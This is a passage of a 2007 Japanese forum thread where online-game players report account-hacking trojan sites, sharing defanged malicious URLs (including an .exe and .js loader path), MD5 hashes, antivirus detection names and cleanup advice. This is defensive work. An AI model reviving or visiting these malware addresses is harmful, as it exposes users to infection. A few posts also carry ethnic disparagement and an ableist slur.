848 名前:846:07/06/26 13:03 ID:uE6dV61M0
申し訳ありません、IE 6.0 です

849 名前:(^ー^*)ノ〜さん:07/06/26 13:08 ID:kKR610Wf0
>セキュリティソフトが反応したとはいえ、不安なのでPCクリーンインストールしてきます。
まぁ、確実ではあるな。頑張ってこい。

850 名前:(^ー^*)ノ〜さん:07/06/26 14:24 ID:mE+XM0UW0
気付いたらPG2のブロックのログにwww■5xuan■comが大量に並んでた
いつの間に・・・

851 名前:(^ー^*)ノ〜さん:07/06/26 14:40 ID:N/KKsKXU0
>>850
http://enif.mmobbs.com/test/read.cgi/livero/1177485590/732-753

852 名前:(^ー^*)ノ〜さん:07/06/26 16:37 ID:mE+XM0UW0
>>851
スレ汚し申し訳なかったそしてありがとう
今OS再インストの準備してたものだから助かった

てっきりどこかで危ないもの拾ってきたのかと思って・・・

853 名前:(^ー^*)ノ〜さん:07/06/26 22:42 ID:eUprFTWv0
PG2の仕様も知らずに入れているならいっそ消しちゃえば?
むしろ挙動の分からない何かを安心して使うその神経の方がヤバい

854 名前:(^ー^*)ノ〜さん:07/06/26 23:44 ID:dHQRAlE50
想定外の動作だし驚いても仕方ない
俺もめちゃあせったし

855 名前:(^ー^*)ノ〜さん:07/06/26 23:49 ID:u37u7uV50
今回のは仕方ない。資料室側さんも想定外だったっぽいし。
俺も知り合いがその現象になっているって言われるまでそんな事起きてるとは気づかなかった。

856 名前:(^ー^*)ノ〜さん:07/06/27 06:47 ID:IuRVVTr50
gTLDは国籍を問わない実装だからね。
当時のarpaやIANAが、もうちょっとccTLDを厳密に運用する思想だったら、現状がまた違ってきたかもしれないけど。

857 名前:Logue ◆grDYeooZwg:07/06/27 19:18 ID:cAQiJz/+0
初回限定のAI配布。さんの外部リンク確認 JavaScript版を参考に
こんなものを作ってみました。
http://forum.logue.be/index.php/topic,353.0.html

JavaScript使用可能なblogならどこでも使えます。
・安全ドメイン
・リファラー消し機能
・javaScriptで描画しているため、検索エンジンへのヒット率への影響なし

858 名前:(^ー^*)ノ〜さん:07/06/29 09:50 ID:uRySI7xd0
本家あこすれてんぷらのTOPが改竄されてた。
既知のアドレスなので報告不要な気もするけど。

---------------------------
Thor鯖で活動中のヘタレGvGer
基本はプレイ日記、週1でGvレポ、たまーに考察なども。
http://www■mbspro6uic■com/mbsplink
---------------------------

>846もそうだけど中華はまだまだ諦めてないっぽいというか
海外クレカ規制でまた激化しそうな予感。

859 名前:(^ー^*)ノ〜さん:07/06/29 11:50 ID:uK9W6ikP0
結局変なurlは踏むなって事だけどな

怪しい所踏んでウィルスソフトが何も反応無かったら、再インスコ

860 名前:(^ー^*)ノ〜さん:07/06/29 21:45 ID:MiW3fScd0
age

861 名前:(^ー^*)ノ〜さん:07/06/30 02:07 ID:4hhAY9bv0
踏んだ時のPCの挙動ってどんな感じなんだろう?
さっきいきなり正体不明なアラートが鳴ってガクブル

862 名前:(^ー^*)ノ〜さん:07/06/30 02:14 ID:hvnhaI470
>>861

>>1
重要な情報が埋れてしまわないようにする為、一般的なセキュリティ
対策・相談・雑談は>>2に有る雑談スレを利用して下さい。

セキュリティ対策、質問・雑談スレ2
ttp://enif.mmobbs.com/test/read.cgi/livero/1177485590/

863 名前:(^ー^*)ノ〜さん:07/06/30 15:13 ID:TvZS72tV0
【  アドレス   】 http://www■mbspro6uic■com/mbsplink
【気付いた日時】 今日の11:30
【     OS    】 Windows XP Home Edition ver.2002 SP2
【使用ブラウザ 】 IE6.0.2900.2180 sp2
【WindowsUpdateの有無】 最終は一週間前程、自動インストール
【 アンチウイルスソフト 】 Kaspersky Internet Security 6.0 試用版
【その他のSecurity対策 】 特になし
【 ウイルススキャン結果】 Trojan-Downloader.JS.Agent.hf
Exploit.Win32.IMG-ANI.ac 検出、削除
【スレログやテンプレを読んだか】 Yes
【hosts変更】無
【PeerGuardian2導入】無
【説明】殴りアコプリスレテンプレの真っ黒なブツを踏んでしまった。
とりあえずカスペルスキーでひっかかった物だけ削除しておいたけれど、
PCは一台しかない。
Passは変更したほうがいいのだろうけれど、このPCにウィルスが残っていたら詰み。
次に打つべき手をご教授願いたい。

864 名前:(^ー^*)ノ〜さん:07/06/30 15:17 ID:61vXSDb30
不安ならOS再インスコ汁

865 名前:(^ー^*)ノ〜さん:07/06/30 21:17 ID:ntgS5PS80
ROと関係あるかどうか、素人の自分には判断つかなかったのですが一応報告

www■qsmoviex■com/

www■qsmoviex■com/1■exe
www■qsmoviex■com/flash■js

数日前に見つけて以来
通報→「Maran.xxで対応する」→即ファイル置き換え、検出不可…のイタチごっこ状態
この場合bit-driveに通報した方が早いのだろうか

866 名前:(^ー^*)ノ〜さん:07/07/01 12:12 ID:Vvt9EYzE0
bit-drive、ソニーのサービスか…。

867 名前:(^ー^*)ノ〜さん:07/07/01 13:09 ID:gGuTPCA70
>>865
Kaspersky
1.exe - infected by Trojan.Win32.Agent.are

NOD32
すりぬけ

久しぶりにちょっくら報告いってくるわ

868 名前:(^ー^*)ノ〜さん:07/07/01 20:30 ID:Vvt9EYzE0
んー、敵さんカスペ入れてるな。
パターンが降ってきて消されたらアップしてる感じ。
他のベンダの対応は追いつかんと思う。
Dr.WEBが何気にひっかけてるなぁ。

869 名前:(^ー^*)ノ〜さん:07/07/01 20:31 ID:4R6ISrz50
そりゃ、ここでカスペを推奨してるんだから、当然カスペでは引っかからないように作るだろ

870 名前:(^ー^*)ノ〜さん:07/07/01 20:51 ID:Vvt9EYzE0
ここだけを見てるわけでもないだろ。
今までのトロイサイト(最近静かな福建ドメイン乱立部隊を含む)は
パターンが降ってきたと思われるタイミングで
リアルタイムに消されることはなかったんだよ
(qsmoviexはWindowsServer2003だが、これにカスペを入れているんだろう)。

ちなみに日本国内のシェアを考えると、Nortonとバスターにさえスルーされれば
大半のPCを食える(ソースネクストは性能がアレなので検証する必要がない)。

871 名前:(^ー^*)ノ〜さん:07/07/01 21:15 ID:7//pDu5x0
今日の2つ(今朝4時過ぎと夕方18時過ぎ)、昨日のまでと比べて
サイズが2倍ほどになってる。機能が違う予感。
NortonとMcAfeeには提出、バスターは通信事情で送れないので誰か頼む。

872 名前:(^ー^*)ノ〜さん:07/07/01 21:42 ID:gGuTPCA70
>>871
私が送ったのは、13:07の奴だな。21:39現在、ファイルサイズは同一だが、FCで比較したら異なってた。
現時点で、カスペもNOD32もすり抜ける。もっかい報告行って来るわ。

873 名前:(^ー^*)ノ〜さん:07/07/01 22:45 ID:gGuTPCA70
1.exe の検体

13:07−121,856Byte−Trojan.Win32.Agent.are,NOD32すりぬけ
MD5:ead1077bee10483a062c0899f3037e31

21:45−121,856Byte−カスペ、NOD32ともに検出すりぬけ
MD5:a1ac691edfa585c817d00f1e62d725d2


セキュスレテンプレにある宛先、キングソフトに両方の検体送付完了。
どの程度の頻度で差し変えているんだか。ROの垢ハックなのか不明な(多分別物?)ものだけど
ここで続けてていいのかな。セキュスレに移動すべき?

874 名前:(^ー^*)ノ〜さん:07/07/01 23:07 ID:w3PZueeY0
このドメインについては日に数回差し替わるので
このスレ的にはhostsに書いたら終わりってことで、
あとは気がついたら送付でいいんでない?
こちらはHTTPヘッダの定期チェックに放り込んだ。

しかし何に使うのかがわからん。どこかのBlogやBBSに
爆撃してるんだと思ったんだけど、ググっても出てこない。
メールやメッセンジャで送ってるのかな。

875 名前:(^ー^*)ノ〜さん:07/07/01 23:18 ID:5+h0sj1B0
qsmoviexドメインだが、調べたらこれまた福建。
福建省福州市住所になってんな、また福建人どもか、と。

owner-contact: P-PSL118
owner-fname: Paul
owner-lname: lau
owner-street: fujian (福建省)
owner-city: fuzhou (福州市:福建省の州都)
owner-zip: 000001
owner-country: CN

876 名前:(^ー^*)ノ〜さん:07/07/02 00:04 ID:hCCmPOsS0
あれ、PG2で企業関係ブロックしててSONYなんちゃらって出てたから、別件だと思ってたけどCNドメインだったか。
開発して他のサイトで使うように配布してるのかな?

877 名前:(^ー^*)ノ〜さん:07/07/02 01:30 ID:p4IcFVYA0
IPから引くとソニーのbit-driveっつーne.jpが返るんだよね。
bit-driveのVPNか何か知らんけど(いちおうチクってある)、
これでファイアウォールの類の突破を狙ってるのかなぁ。
今のところDr.WEBが全部捕まえてる。
この手のはBitDefenderが健闘していい気もするんだが…。

878 名前:(^ー^*)ノ〜さん:07/07/02 05:28 ID:i4XtmMmT0
>>874
>しかし何に使うのかがわからん。
自分が見つけた経緯は、秒ナビ(画像共有サイト)のメインページ(index.html)が
改ざんされて、末尾にスクリプトが書き加えられていた事からです
内容は>>865のflash.jsとほとんど同じでした
サイト管理者も異常に気づいたのか、今は削除されています

なんちゃってプロバイダのように錯誤狙いできるURLでは無いので
このように強引な手法をとるか、あるいは他の罠サイトから呼び出される形になるかなぁと

RO関係とは自身では断定できなかったので報告は迷ったのですが
トロイがMaranやOkaragと命名された事や、その他これまでの罠サイトと比較して
色々と物珍しい特徴があったので一応、という事で

879 名前:(^ー^*)ノ〜さん:07/07/02 13:59 ID:b5FZxU7W0
ソニー(bit-drive)から返信来ましたよ。
ウイルスが確認できませんでした、とさ。
カスペから逃げ回るように更新してるのに
他のプロダクトでそう簡単に検知できるわけねーだろ…。

880 名前:(^ー^*)ノ〜さん:07/07/02 18:57 ID:Zju5Fs/20
それを追記してもう一回送ってみてはくれまいか

881 名前:(^ー^*)ノ〜さん:07/07/02 19:06 ID:WEX+4ebO0
17:45にアップされたので今送った。これ3度目。
さっきカスペに対応されて消されたみたいでさ。
404だったって返事が来た。どうしたもんかねこれ。

882 名前:(^ー^*)ノ〜さん:07/07/02 19:12 ID:klOdCECl0
さすがソニーだな

883 名前:(^ー^*)ノ〜さん:07/07/02 19:17 ID:Zju5Fs/20
ソニー側で更新したログくらいは見れそうなもんだが・・・
犯罪に繋がる事なので少し監視しておいてくれみたいな事付け加えてみるとかはどうかな?

884 名前:(^ー^*)ノ〜さん:07/07/02 19:31 ID:WEX+4ebO0
こちらがメールを送ってからソニーの中の人が確認する数時間の間に
カスペが掃討しちゃうんだよなぁ。ま、のんびりやりますわ。

885 名前:(^ー^*)ノ〜さん:07/07/02 19:55 ID:hCCmPOsS0
1.exe

Kaspersky
07/01 13:07 - infected by Trojan.Win32.Agent.are(20070701.zip)
07/01 21:45 - Trojan-PSW.Win32.Maran.ey(20070701_1.zip)
07/02 19:36 - 検出すり抜け(ファイル差し替えられています)

NOD32
いずれもすり抜け

886 名前:(^ー^*)ノ〜さん:07/07/02 19:59 ID:/CwbezVB0
いい加減LiveRO行けば?

887 名前:(^ー^*)ノ〜さん:07/07/02 20:23 ID:hCCmPOsS0
>>886

>>878
どうやら、垢ハック関連ぽいのでこっちでいいかと。

888 名前:(^ー^*)ノ〜さん:07/07/03 00:50 ID:VMTlKK6i0
なんかメンヘラっぽいな

http://chru.blog86.fc2.com/

889 名前:(^ー^*)ノ〜さん:07/07/03 00:51 ID:VMTlKK6i0
おう、スマン誤爆だ

890 名前:(^ー^*)ノ〜さん:07/07/03 03:03 ID:vCeKnlDM0
削除依頼しておけよ〜

891 名前:まと ◆sp4Sh9QXGI:07/07/03 10:34 ID:tyQJXomz0
http://sky.geocities.jp/vs_ro_hack/faq.htm
FAQを作ってみました。
「この質問を追加したら?」
「ここはこうしたほうがいいんじゃない?」(特にQ4)
等ありましたらどうぞ。

892 名前:(^ー^*)ノ〜さん:07/07/03 12:38 ID:s+6O4N6A0
>>885
NOD32
07/01 13:07 - Win32/PSW.Maran トロイ
07/01 21:45 - Win32/PSW.Maran トロイ
07/02 19:36 - Win32/PSW.Maran トロイ

検知できるようになってました。あと、flash.jpも、JS/TrojanDownloader.Psyme.IW トロイ と検知。

893 名前:(^ー^*)ノ〜さん:07/07/03 17:06 ID:b7b+jMtY0
>>891
そういう議論はセキュリティスレのほうがよいんじゃなかろか。
あっちでまとまった結果がそこに反映されていればよいし。

http://enif.mmobbs.com/test/read.cgi/livero/1177485590/

894 名前:(^ー^*)ノ〜さん:07/07/04 08:39 ID:4Q9aSiwG0
qsmoviex更新激しいなぁ…。

895 名前:(^ー^*)ノ〜さん:07/07/04 09:15 ID:uRmky6If0
qsmoviex9時13分現在で中身なし。

896 名前:(^ー^*)ノ〜さん:07/07/04 09:23 ID:4Q9aSiwG0
早朝見たflash.jsにはAlexaInstaller.exeがあり、
その後このexeがmarsbar.exeになってさらにその後jsが消えた。
一日中メンテしとるのかこいつは…。

897 名前:(^ー^*)ノ〜さん:07/07/05 23:23 ID:OR33vkHr0
http://www■qsmoviex■com/ DNSから消えた模様。ドメイン登録取り消されたかな?

898 名前:(^ー^*)ノ〜さん:07/07/06 10:50 ID:Ee3mKtV00
先程、カスペルスキーでのスキャンを試したところ、
Trojan.Win32.LipGame.cdというものが検知されました。
検出元はC:\Program Files\Ternd Micro\VB2004_1120\Tools\TOOL\3034\3034EASYSIRC.com/fix_sirc.com

スキャンが完了次第削除などをするつもりですが、
これはアカウントハックに関するものなのでしょうか。
自分でも調べてはみましたがROに関連性する情報は見つけられませんでした。
もし、アカウントハックに関連するものであれば情報をお願いしたく存じます。

899 名前:(^ー^*)ノ〜さん:07/07/06 11:10 ID:UqfNI8SD0
カスペのサイトでその名前で検索してみたが、.cdではないなあ
.cがttp://www.viruslistjp.com/viruses/encyclopedia/?virusid=110065
.dがttp://www.viruslistjp.com/viruses/encyclopedia/?virusid=110176
どちらにしてもtrojamだしね

というかなんで
>C:\Program Files\Ternd Micro\VB2004_1120\
なんだろう
その辺確認した方が良くない?

900 名前:(^ー^*)ノ〜さん:07/07/06 11:18 ID:cJWNigVa0
>>898
そのファイル名は、トレンドマイクロのウィルス削除ツールのようですね。
誤検出の可能性もあるので、トレンドマイクロに問い合わせてみてはいかがでしょうか。

901 名前:(^ー^*)ノ〜さん:07/07/06 11:22 ID:Ee3mKtV00
898です。
C:\Program Files\Ternd Micro\じゃなくて、
C:\Program Files\Trend Micro\でした。

動揺していたとはいえ正確な情報でなくてすみませんでした。

902 名前:(^ー^*)ノ〜さん:07/07/06 11:31 ID:UqfNI8SD0
>>901
いや、というか>>900さんの言うとおり、ウイルスバスター関連だから誤検出もあるかなと
隔離したファイルをまた別のウイルス対策ソフトで踏むこともあるし

ちなみにそのフォルダはたぶんウイルスバスター2004のセットアップファイル群
なので今2007とか他社製品入っているなら、容量の関係もあるから
消してしまってもいいのではと思った
(消す前に、念のために今インストールされているウイルスバスターの位置も確認してください)

903 名前:(^ー^*)ノ〜さん:07/07/06 12:05 ID:Ee3mKtV00
>>900
>>902
情報ありがとうございます。

早速トレンドマイクロに問い合わせようとしましたが、
なにぶんウイルスバスターを導入していたのが2004版だけでしたので、
問い合わせに必要なシリアル番号などを紛失している体たらくです。

そこで、今は他社製品を使用している兼ね合いからも
削除の方向で検討したい思います。

904 名前:(^ー^*)ノ〜さん:07/07/06 12:23 ID:56P7unOY0
実にぬるぽだな

905 名前:(^ー^*)ノ〜さん:07/07/06 13:29 ID:drokWK+e0
実にガッだな

906 名前:(^ー^*)ノ〜さん:07/07/06 15:32 ID:8BNGRPKM0
>>897
IPは生きているので別ドメイン立てたかもなぁ。

907 名前:(^ー^*)ノ〜さん:07/07/06 21:59 ID:JVtwePH+0
最近アカハックURL貼り付けが復活してきてるので注意!
BOTが壊滅気味だからまたそっちに切り替えてきたか?
皆もう忘れがちのようなのでageておこう。

908 名前:(^ー^*)ノ〜さん:07/07/06 22:11 ID:i7pVAleN0
壊滅気味なの?

909 名前:(^ー^*)ノ〜さん:07/07/06 22:22 ID:cJWNigVa0
一見減ったように見えるのは事実。但し、BAN作業を行なった確証はなく、単に接続を控えているだけで
すぐに戻るだろうというのが大方の予測。

910 名前:(^ー^*)ノ〜さん:07/07/06 22:32 ID:56P7unOY0
癌ごときに一体何が出来るというのか

911 名前:(^ー^*)ノ〜さん:07/07/07 07:45 ID:TLIcX9Xr0
どうせアピール程度だよ
実効が出るとは全く思えない

912 名前:(^ー^*)ノ〜さん:07/07/07 08:43 ID:gkf+zrw/0
壊滅したように見せかけて実は潜伏しているだけ
BOTメイン産のアイテムの相場上昇を見計らって復活するんじゃね?

913 名前:(^ー^*)ノ〜さん:07/07/07 21:16 ID:bWptL3rs0
続々とBOTが接続してきましたよ。分かり切ってる事なんだけどぬるぽ

914 名前:(^ー^*)ノ〜さん:07/07/08 00:16 ID:uQXEfniN0
がっがっがっがおー

915 名前:(^ー^*)ノ〜さん:07/07/08 14:18 ID:HEm2a/hC0
>908-914
雑談スレへどうぞ。
セキュリティ対策、質問・雑談スレ2
http://enif.mmobbs.com/test/read.cgi/livero/1177485590/

916 名前:(^ー^*)ノ〜さん:07/07/08 20:04 ID:DZDQmUHr0
セキュ質問・雑談スレの方にBOTの話を持ってこられても、やっぱりスレ違いかな、と。

917 名前:(^ー^*)ノ〜さん:07/07/08 20:20 ID:chGwbGjt0
あやしい投稿の報告はこちらでいいんでしょうか?

918 名前:(^ー^*)ノ〜さん:07/07/08 20:59 ID:chGwbGjt0
実際には踏んでいませんが、うちのHPの画像BBSに貼られていた怪しい投稿

【  アドレス   】>198のものでした。

忍術型 Tilna__79
私の忍者もINT先行の忍術型ですが、タゲを取ってくれる前衛がいると結構いけます。
今わりと回りも新キャラ育成に走っているので、それなりにPTが組めますよ。
忍術ソロは正直マゾいというか、あまり面白くない気が???。
しかし、手持ち金がほとんどないのに、金のかかるアルケミと忍者をやるのはつらいorz

自キャラに忍者がいないのに、「私の忍者『も』」とあったので、怪しいとおもい踏みませんでした。

【気付いた日時】 7/8 20:00 投稿は09:00頃のようですが、仕事で気づきませんでした。
【     OS    】 WinXP SP2
【使用ブラウザ 】 Sleipnir
【WindowsUpdateの有無】 自動更新です
【 アンチウイルスソフト 】 (NortonInternetSecurity2006)
【その他のSecurty対策 】 (Spybot S&D、ルータ)
【 ウイルススキャン結果】 (カスペルスキーオンラインスキャンでRODLL.DLL発見 等)
【スレログやテンプレを読んだか】 (今から読みます)
【hosts変更】(無)
【PeerGuardian2導入】無
【説明】 当面の間画像投稿を停止しました。
     BBS自体を当分停止するか、廃止したほうがいいでしょうか・・・。

919 名前:(^ー^*)ノ〜さん:07/07/08 21:07 ID:Q1b9LJVp0
そのBBSが仲間内だけで見るようなものであれば、投稿時にパスワードが
必要なタイプにすれば回避は出来る

そうじゃないなら、日本以外からの投稿を禁止にするだけでも、かなり効果はある

920 名前:(^ー^*)ノ〜さん:07/07/08 21:20 ID:chGwbGjt0
>919
ありがとうございます。
投稿パスワードは設定できそうなので、設定して各所に連絡する事にさせていただきます。

ちなみにttp://www■airbbs■net/ を利用しているのですが、ここはIP制限しかできない&
うっかりIP表示設定にしてなかったという理由で、当面は実行できそうにありません。
どこかにハック業者IPの一覧があればいいですけど、そんな便利な物あれば誰も苦労しませんよね・・・

普段ROの話題の出ないBBSだからと油断しておりましたil||li _| ̄|○ il||li
誰も被害者が出ないといいんですが・・・・・ちくしょー

921 名前:(^ー^*)ノ〜さん:07/07/08 21:41 ID:TObIZbop0
>>920
リネージュ資料室のIPフィルタ用設定をもってきてみては?
中国・韓国・台湾からの接続をすべて遮断すればだいぶ幸せになれるかも。

922 名前: (^ー^*)ノ〜さん:07/07/09 14:03 ID:UQ1+JuJI0
先ほどカスペルスキーでスキャンをしたところ
Trojan.Java.ClassLoader.kとTrojan.Java.ClassLoader.i いうのが検知されました。
検出先は
C:\Documents and Settings\All Users\Application Data\Symantec\Norton AntiVirus\Quarantine\15CA49F6.tmp
C:\Documents and Settings\All Users\Application Data\Symantec\Norton AntiVirus\Quarantine\3A8A3E37.tmp
からTrojan.Java.ClassLoader.k が検出され

C:\Documents and Settings\All Users\Application Data\Symantec\Norton AntiVirus\Quarantine\61DE5F08.tmp
から Trojan.Java.ClassLoader.iが検出されました。

スキャンが完了次第削除などをするつもりですが、
これはアカウントハックに関するものなのでしょうか。
自分でも調べてはみましたがROに関連性する情報は見つけられませんでした。
もし、アカウントハックに関連するものであれば情報をお願いしたく存じます。

923 名前:(^ー^*)ノ〜さん:07/07/09 14:05 ID:YhqDytJ40
気になるならウイルス削除してから垢のパス変えればいいじゃん・・・
ただ、それだけでしょ・・・

924 名前:(^ー^*)ノ〜さん:07/07/09 14:15 ID:YNqRwnJj0
Quarantine = 検疫する; 隔離する

つまり、お使いのノートンが以前に隔離処理したウイルスを
カスペが検出しただけの可能性が強い。
ノートンのことはよく知らないけど隔離されたファイルを削除するとよろし。

925 名前:(^ー^*)ノ〜さん:07/07/09 14:48 ID:UQ1+JuJI0
922です。
>>924 情報ありがとうございました。

926 名前:(^ー^*)ノ〜さん:07/07/09 18:41 ID:qrMBc9N80
複数のアンチウィルスソリューションの同居は、トラブルの元。
処理が競合すれば、OSのカーネル部分でデッドロックの可能性もある。
信頼のおける物以外はアンインストールしてから、必要なものを入れるべき。

927 名前:(^ー^*)ノ〜さん:07/07/09 23:27 ID:TPYd4s9L0
【  アドレス   】 http://bukuro■xxxxxxxx■jp/ro■html
【気付いた日時】 踏んでから数分後
【     OS    】 WinXP SP2
【使用ブラウザ 】 IE6.0
【WindowsUpdateの有無】 結構前だったと思います
【 アンチウイルスソフト 】 avast!
【その他のSecurty対策 】 Spybot S&D
【 ウイルススキャン結果】 Exploit.HTML.Mhtが3つ、Email-Worm.Win32.Luder.eが1つ検出されました
                 どちらも垢ハックウィルスとは関係無さそうですが一応
【スレログやテンプレを読んだか】 Yes
【hosts変更】 無
【PeerGuardian2導入】 無
【説明】
鯖板にて踏んでしまいました
飛んだ先は普通のROエンブレム配布サイトで、特に変わったところはなかったのですが
(サイトを開いたときにブラウザの方も特に不審な動きなどは見られませんでした)
数分後に「垢ハックだから踏むな」という注意のレスが付いたので怪しいアドレスと判断しました
とりあえずROへのログインやMMOBBSを見る以外のネット接続は控えています
本当に垢ハックサイトなのか、それとも無害サイトなのかは未だにわかりません・・・

928 名前:(^ー^*)ノ〜さん:07/07/11 03:12 ID:NBwTa2BA0
http://pc11.2ch.net/test/read.cgi/hack/1177503872/902-906
垢ハックだから踏むなと言った奴は根拠を提示したのか?

929 名前:(^ー^*)ノ〜さん:07/07/12 00:00 ID:H3KR+ndo0
最近ギルメンがアカハックくらったみたいなんだけど
マウスクリックで入力するキャラパスも見破られちゃうもんなの…?

930 名前:(^ー^*)ノ〜さん:07/07/12 00:05 ID:l5p9LsUz0
今頃何を言ってるんだ

そんなの実装されて一週間もしないうちにハックされてるよ

931 名前:(^ー^*)ノ〜さん:07/07/12 00:24 ID:2JBy9aHd0
入力のSS取られてる説
パケットが読まれてる説

などあるけど、突破されてるものと思っておいた方が良いと思うよ

932 名前:(^ー^*)ノ〜さん:07/07/13 02:47 ID:PcrHYjwJ0
そういう質問はこっちでな。
ttp://enif.mmobbs.com/test/read.cgi/livero/1177485590/

キャラパス実装前から実装されてもSSやパケ読みで突破されるよなって散々言われてたし。

933 名前:(^ー^*)ノ〜さん:07/07/13 22:12 ID:Jfpd846a0
いつもサーフィンするときは注意していたのですが今日スキャンした所、
Tracking Cookie
というのが検出されました。
詳細を見たところCookie:●●●(←ユーザー名)@valueclick.ne.jp
というのが、出てきたのですが。
調べたところ、問題ないとかいてあるサイトと、問題があるとかいてあるサイトが
あったのですが、実際の所どうなのでしょうか?

934 名前:(^ー^*)ノ〜さん:07/07/13 22:16 ID:ZJalIsDf0
cookieかよ…まずググってみれ

935 名前:(^ー^*)ノ〜さん:07/07/13 22:19 ID:/lFoJsNb0
>>933
>>932の方で、何度か出てたはず

936 名前:(^ー^*)ノ〜さん:07/07/13 22:31 ID:Jfpd846a0
自分なりに調べたのでは、Tracking Cookieはスパイウェアであると書いてある
サイトと、スパイウェアでは無く、対した影響は無いと書いてあるサイトが
あったものでどうなのかなと・・
cookieの意味はおぼろげにわかっているのですが、それだと影響が無さそうだなと
自分では思っています。ただ心配なので詳しい方のご意見を伺いたいなと思いまして・・

937 名前:(^ー^*)ノ〜さん:07/07/13 23:06 ID:Ftp+nw4r0
とりあえずこっちではない

938 名前:(^ー^*)ノ〜さん:07/07/13 23:12 ID:wmc+34yB0
おぼろげに分かってんならcookieについて調べて理解すればいいのに
どう考えてもおかしいだろ、聞いてる事がw

939 名前:(^ー^*)ノ〜さん:07/07/13 23:38 ID:Jfpd846a0
どうも自分が調べた範囲では問題が無いようです。
スレ違いもあったようですね・・
申し訳ありませんでした

940 名前:(^ー^*)ノ〜さん:07/07/15 16:14 ID:Rg+sUo1T0
【  アドレス   】http://www■mbspro6uic■com/mbsplink
【気付いた日時】 7月15日14時
【     OS    】XP SP2
【使用ブラウザ 】IE6.0 SP2
【WindowsUpdateの有無】 一番最近のUPの一個前としか。基本的に自動更新です。
【 アンチウイルスソフト 】 ノートン4.0
【その他のSecurty対策 】 Windowsでの設定くらいです
【 ウイルススキャン結果】 (カスペルスキーオンラインスキャンでRODLL.DLL発見 等)
【スレログやテンプレを読んだか】 読みつつ書いています
【hosts変更】無
【PeerGuardian2導入】無し
【説明】
症状はまだ不明です。
調べたところ相当あやしいurlだったようで…
一応IE等でできるところまでは対策はしてるのですが…

941 名前:(^ー^*)ノ〜さん:07/07/15 16:32 ID:MyWJDuOf0
>>940
リストと照らし合わせてないけど、既出の垢ハックアドレスにあったと思う。
セキュリティソフトで削除するか、OS入れなおすかの対処になる。

入れているノートンが反応したのではなく、カスペオンラインスキャンで検知したということだろうか。

除去するまでは、ログイン・パス変更しない。
間違ってログイン等していた場合、早急に(除去・もしくは手持ちの安全な環境で)パスワード変更を。

踏んだと思われる時期以降、ログインしていた場合の安全な環境の作り方はわかるかな?
わからないようなら質問を。1CDLinuxからブラウザ立ち上げて変更するのが簡単だよ。

対処頑張れよ。

942 名前:940:07/07/15 16:50 ID:Rg+sUo1T0
現在カスペのオンラインスキャン中ですね。
以前から引っかかってた4つのファイル以上出てくるとアウトといった感じです。

踏んだのはすぐにわかったのでin等の操作はまったく触れていません。

除去もいいんですが、いっそ初期化してしまおうかとも…
問題は古いPCなのでXPのSP2のUPデートからってことだけで。

対処頑張ります

943 名前:(^ー^*)ノ〜さん:07/07/15 16:57 ID:bd3Pq6590
なんか数年前に使ってたPcでROを起動しようとしたらnProにInternet Optimizerっていうウィルスに感染してるとか出たんだけど…
これってやっぱりセーフモードでこのファイル削除するだけじゃダメなのかな…

944 名前:(^ー^*)ノ〜さん:07/07/15 17:07 ID:CN4q949n0
それだけじゃ意味不明なのでテンプレ埋めてください

945 名前:(^ー^*)ノ〜さん:07/07/15 18:17 ID:bd3Pq6590
悪い…いきなりnProになんか出てきたから気が動転してた…
【気付いた日時】 本日昼頃
【     OS    】 ME
【使用ブラウザ 】 IE6.0
【WindowsUpdateの有無】 多分去年の夏
【 アンチウイルスソフト 】 AVG Anti-Virus Free Edition
【その他のSecurty対策 】 特に無し
【 ウイルススキャン結果】 現在進行形でスキャン中
【スレログやテンプレを読んだか】 Yes
【hosts変更】無
【PeerGuardian2導入】無
【説明】
大分前に使ってたPcで2PcやろうとROの最新パッチあてて起動しようとしたらnProのウィンドウが開いてInternetOptimizerっていう名前のウィルスが検知されたって出たんです。
とりあえずそのウィルス名でぐぐったら広告を表示する目的でのウィルスらしいけど怖くなったんでセーフモードに入って削除。
それ以降ROを起動(インはしてない)した時にnProの反応は無くなったんですが…
本当はもっと前に気づくべきだったんだろうけど…最後に起動したのが最早1年前なんで…

946 名前:(^ー^*)ノ〜さん:07/07/15 19:04 ID:MyWJDuOf0
>>942
SP適用済みCDを作ってからインストールすると楽ですよ。

http://www.ak-office.jp/
ここにあるSP+メーカーというのを使ってみて下さい。では、再インストールいってらー。(^^)/~~~

>>945
http://www.symantec.com/region/jp/sarcj/data/a/adware.netoptimizer.b.html

ここにあるレジストリも参照して、取り付いてなければOK、残ってたら削除でいいんじゃないかな。

947 名前:(^ー^*)ノ〜さん:07/07/15 23:24 ID:ljHTisfZ0
ttp://www■mbspro6uic■com/mbsplink
日付: 2007-07-15 17:13:17
IPアドレス: 211.3.201.194

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 211.3.0.0/16
b. [ネットワーク名] ODN

通報しますた

948 名前:940:07/07/16 15:57 ID:GyINkPdo0
>>946
おお…ありがとうございました

データ整理もかねてリカバリー致しまして、
現在諸々の設定やらDLしてます。

少しは動作軽くなるといいな。
3年近く初期化してないもので(苦笑)

949 名前:(^ー^*)ノ〜さん:07/07/17 19:17 ID:uDrDlurT0
何気なくRO2でググって引っ掛けたWikiのメニューバーのリンクが23stylesに改竄されてた。
(偶然だが改竄日が今日で、本日のアクセス数は1桁だったので、多分被害者は居ないと思う)

RO2ってROと違って有名どころというのはまだ無いだろうし、これからいくつも生まれる可能性が
あるだろうし、Wikiやらを建てる管理人の設定次第では今後被害者が増えるかもしれない。
それに中華とかが自ら建てる可能性も否定できない。

今更の事だけど、知らないWikiや新しいWikiを見るときは普段以上にご注意を。

950 名前:(^ー^*)ノ〜さん:07/07/20 05:47 ID:gBEPPosX0
ハ-。゚+ヽ(´∀`*)ノ ゚+。-ィ

951 名前:(^ー^*)ノ〜さん:07/07/20 21:51 ID:IY6uXugzO
あげ

952 名前:(^ー^*)ノ〜さん:07/07/20 21:51 ID:IY6uXugzO
あげ

953 名前:(^ー^*)ノ〜さん:07/07/21 16:13 ID:OOV7tiUH0
このスレ見るような連中にはアカウントハックされるようなリアルINT1不注意池沼はいないとはおもうが
念のため警告
中華BOTerが本気だしてきてますw

954 名前:(^ー^*)ノ〜さん:07/07/21 16:55 ID:igEEs+zz0
煽りにしかなっていない1行目は不要。

955 名前:(^ー^*)ノ〜さん:07/07/21 17:04 ID:rm4MQzT90
本気出してきてますってことは
今まで以上に悪質・巧妙・執拗になってきてるってことか?

956 名前:(^ー^*)ノ〜さん:07/07/21 17:23 ID:8H+Hg1HB0
具体的なことは何も言わずにんなこと言われても煽りにしか見えんよなあ。

